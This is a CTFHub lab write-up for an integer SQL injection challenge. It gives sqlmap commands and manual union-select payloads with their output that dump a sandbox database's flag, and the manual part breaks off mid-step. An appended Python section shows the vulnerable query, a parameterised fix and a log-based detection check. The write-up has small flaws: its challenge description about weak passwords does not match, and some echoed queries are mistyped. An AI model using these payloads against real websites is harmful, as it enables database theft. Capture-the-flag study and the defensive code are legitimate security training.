CTFHub write-up: Web SQL injection
Introduction: a record of the solving process
1. Integer-type injection
Challenge description: a weak password is generally taken to be any password that can easily be guessed by others (who may know you well) or broken by a cracking tool.
Method 1: injection with sqlmap
Nothing is as convenient as sqlmap; just scan directly:
<1>. Use sqlmap to dump the current database name
python sqlmap.py -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" --current-db
[16:29:30] [INFO] fetching current database
current database: 'sqli'
sqlmap reveals the database name: sqli
<2>. Use sqlmap to list all table names in the specified database
python sqlmap.py -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" -D sqli --tables
[16:30:07] [INFO] retrieved: 'news'
[16:30:08] [INFO] retrieved: 'flag'
Database: sqli
[2 tables]
+------+
| flag |
| news |
+------+
sqlmap reveals the table names: flag, news
<3>. Use sqlmap to list all column names of the specified table
python sqlmap.py -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" -D sqli -T flag --columns
Database: sqli
Table: flag
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| flag | varchar(100) |
+--------+--------------+
sqlmap reveals the column name: flag
<4>. Use sqlmap to dump the values of the specified column of the table
python sqlmap.py -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" -D sqli -T flag -C flag --dump
Got the flag:
Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{c738d407d82740b4fa840800} |
+----------------------------------+
Method 2: manual injection
<1>. Use an order by n statement to determine the number of columns
1 order by 2
select * from news where id=1 order by 2
ID: 1
Data: ctfhub
<2>. Use a union query to find which positions are echoed back
id=-1 union select 1,2
select * from news where id=id=-1 union select 1,2
ID: 1
Data: 2
<3>. Get the current database name
id=-1 union select 1,database()
select * from news where id=id=-1 union select 1,database()
ID: 1
Data: sqli
<4>. Query the table names in the sqli database
-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'
select * from news where id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'
ID: 1
Data: news,flag
<5>. Get all column names of the flag table
-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
select * from news where id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
ID: 1
Data: flag
<6>. Get the contents of the column in the table of the specified database
-1 union select 1,group_concat(flag) from sqli.flag
-1 union select
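The defender's view of the same query pattern. The example below is added here and is not part of the original write-up: it rebuilds the challenge's news/flag layout in an in-memory SQLite database (constructed sample data with a placeholder flag), shows why `select * from news where id=<input>` accepts the write-up's `order by` and `-1 union select 1,2` probes, the integer check plus bound parameter that stops them, and a log check that flags requests whose id is not a plain integer. The function names, schema and log lines are assumptions of this example.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlparse

def make_db():
    # Constructed stand-in for the challenge schema (SQLite, in memory).
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, data TEXT);
        INSERT INTO news VALUES (1, 'ctfhub');
        CREATE TABLE flag(flag VARCHAR(100));
        INSERT INTO flag VALUES ('ctfhub{placeholder_not_the_real_flag}');
    """)
    return conn

def lookup_vulnerable(conn, raw_id):
    # The pattern the write-up exploits: the raw parameter is spliced into the
    # query text, so "order by" and "union select" become part of the SQL.
    return conn.execute("select * from news where id=" + raw_id).fetchall()

def lookup_hardened(conn, raw_id):
    # Fix: enforce the integer type, then bind the value as a parameter.
    # Anything that is not a plain integer is rejected before reaching the DB.
    try:
        id_value = int(raw_id)
    except (TypeError, ValueError):
        return None
    return conn.execute("select * from news where id=?", (id_value,)).fetchall()

# Constructed access-log lines; the second carries the write-up's
# echo-position probe, URL-encoded as a browser would send it.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:16:29:30 +0000] "GET /?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:16:30:07 +0000] "GET /?id=-1%20union%20select%201,2 HTTP/1.1" 200 512',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def suspicious_requests(lines):
    # Detection-side check: lines whose id parameter is not a plain integer,
    # i.e. exactly the requests the hardened lookup would refuse.
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        ids = parse_qs(urlparse(m.group(1)).query).get("id", [])
        if any(not re.fullmatch(r"-?\d+", v.strip()) for v in ids):
            hits.append(line)
    return hits
```

The vulnerable lookup returns the attacker-chosen `2` in the Data position for the union probe, exactly as the challenge page echoes it; the hardened lookup returns None for the same input and the log check reports only the probing request.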